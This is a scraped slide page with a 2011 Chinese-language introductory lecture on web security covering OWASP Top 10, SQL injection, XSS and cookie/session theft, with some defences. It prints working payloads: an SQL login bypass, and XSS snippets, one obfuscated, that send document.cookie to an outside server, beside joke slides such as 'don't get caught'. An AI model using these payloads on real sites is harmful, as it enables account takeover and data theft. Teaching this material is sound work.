1 / 53

中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程

中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程. 網頁應用程式的安全入門. 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com. Agenda. 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session. 2. Agenda. 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session. 3. 不要做 壞事!. 4. 不要被 抓到!. 5. 不要被 抓到!. 6.

shayna
Download Presentation

中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 中央大學電子計算機中心「多媒體與網路應用」資訊推廣課程中央大學電子計算機中心「多媒體與網路應用」資訊推廣課程 • 網頁應用程式的安全入門 日期: 2011/03/27 講師:資工三 張竟 cwebb [dot] tw [at] gmail [dot] com

  2. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 2

  3. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 3

  4. 不要做壞事! 4

  5. 不要被抓到! 5

  6. 不要被抓到! 6

  7. 不要說我教的 7

  8. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 8

  9. 網頁安全? • 早年 vs 現代 • 靜態 vs 動態 • 有程式 就有漏洞! 9

  10. ways to attack • OS • web server • web application 10

  11. attack scenarios • attack web server gain privilege steal informations to attack users • attack other user steal informations execute other attacks • may be composite 11

  12. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 12

  13. 13

  14. OWASP Top 10 - 2010 • A1: Injection • A2: Cross-Site Scripting (XSS) • A3: Broken Authentication and Session Management • A4: Insecure Direct Object References • A5: Cross-Site Request Forgery (CSRF) 14

  15. OWASP Top 10 - 2010 • A6: Security Misconfiguration • A7: Insecure Cryptographic Storage • A8: Failure to Restrict URL Access • A9: Insufficient Transport Layer Protection • A10: Unvalidated Redirects and Forwards 15

  16. OWASP Top 10 - 2010 • A1: Injection • A2: Cross-Site Scripting (XSS) • A3: Broken Authentication and Session Management • A4: Insecure Direct Object References • A5: Cross-Site Request Forgery (CSRF) 16

  17. OWASP Top 10 - 2010 • A6: Security Misconfiguration • A7: Insecure Cryptographic Storage • A8: Failure to Restrict URL Access • A9: Insufficient Transport Layer Protection • A10: Unvalidated Redirects and Forwards 17

  18. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 18

  19. Injections • 駭客的填空遊戲 • where can attacker inject?database (MySQL, MS SQL, PostgreSQL ... ) no-sql Directory Service (LDAP) system command!! 19

  20. how SQL works in web • login page for example sql server select from account where `id`=id and `pwd`=pwd web server client return result request whit id and pwd return login success/failed 20

  21. Why SQL? • 廣大使用 • 儲存大量的網站資料 • injection friendly 21

  22. how injections work? • 以MySQL為例子 • $query = “select from account where `id`=’$id’ and `pwd`=’$pwd’$id=’ or 1=1 -- > select from account where `id`=’’ -- .... 22

  23. attack skills • union • blind attack 23

  24. 影響 • 資料被偷/被改 • 獲得網站權限 • 整個網站被拿下# 24

  25. how to defense • safe API • 過濾逃脫字元 • 不要直接把使用者輸入加入query • 找程式掃描弱點 25

  26. Practice 26

  27. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 27

  28. XSS • Cross Site Scripting • 在別人的網站上寫程式! 28

  29. background knowledge • HTTP GET • HTTP POST 29

  30. how to attack • attack using POST/GET • the “scripting” • in the server • strange url 30

  31. how to attack • javascript • <iframe> / <image> 31

  32. example <body> <? echo “Hello ”.$_GET[‘id’].”; ?> </body> http://goodsite.com/?id=<script>alert(“i’m Orange”)</script> 32

  33. what may happened? • take you to bad site • send your information to attacker • Just For Fun! 33

  34. Just For Fun Samy • MySpace XSS attack • Samy is my hero! • Infection 34

  35. Big Site also XSSable • MySpace • Facebook • twitter • Plurk • ... 35

  36. how to defense • for server • 該逃的還是要逃 • 找程式掃描弱點 • for user • 看到奇怪連結要警覺 • 瀏覽器 / 防毒軟體 36

  37. practice 37

  38. Agenda • 嘴砲 • OWSAP Top 10 • SQL injection • XSS • cookie & session 38

  39. background knowledge • cookie • session A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data. The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases. 39

  40. 40

  41. 41

  42. 如果偷到了cookie 可以.... 42

  43. how to steal it? 43

  44. 44

  45. 把cookie送到雲端! • 用GET / POST方式讓網頁把cookie送走 • <img> / <iframe> ex: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie," >"].join( • sever side is simplejust keep the cookie 45

  46. 哪個白痴會點這鬼連結 http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%22 46

  47. hidden • 有種東西叫短網址(tinyurl.com / 0rz.tw / goo.gl / bit.ly) • 塞進別的網頁裡 (ex: iframe長寬設0或1) • ugly url EVERY WHERE https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2 https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1 47

  48. 防範 • 鎖定user agent / header • 綁IP • *不要被攻擊成功* 48

  49. 鎖定user agent / header if (isset($_SESSION['HTTP_USER_AGENT'])){ if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { exit(); }}else{ $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);} 但是... 當你偷的到cookie 會拿不到header嗎? 49

  50. Practice 50

More Related